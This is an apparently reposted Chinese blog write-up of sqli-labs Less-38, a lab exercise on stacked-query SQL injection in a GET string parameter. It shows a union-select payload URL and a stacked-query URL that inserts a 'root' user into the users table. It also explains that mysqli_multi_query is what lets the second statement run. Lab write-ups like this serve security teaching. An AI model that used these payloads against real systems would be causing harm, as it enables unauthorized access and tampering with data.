我是靠谱客的博主 飞快大树,最近开发中收集的这篇文章主要介绍【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)...,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
这个直接用union select就可以
http://192.168.136.128/sqli-labs-master/Less-38/?id=0' union select 1,2,3%23
看一下源码,发现这关的关键并不在此
mysqli_multi_query()是可以执行多条语句的
来看这个语句
两条select都得到了执行
这个就涉及到了堆叠注入,参考 https://www.cnblogs.com/0nth3way/articles/7128189.html
http://192.168.136.128/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values (15,'root','root')%23
insert执行成功
转载于:https://www.cnblogs.com/omnis/p/8384780.html
最后
以上就是飞快大树为你收集整理的【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)...的全部内容,希望文章能够帮你解决【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)...所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复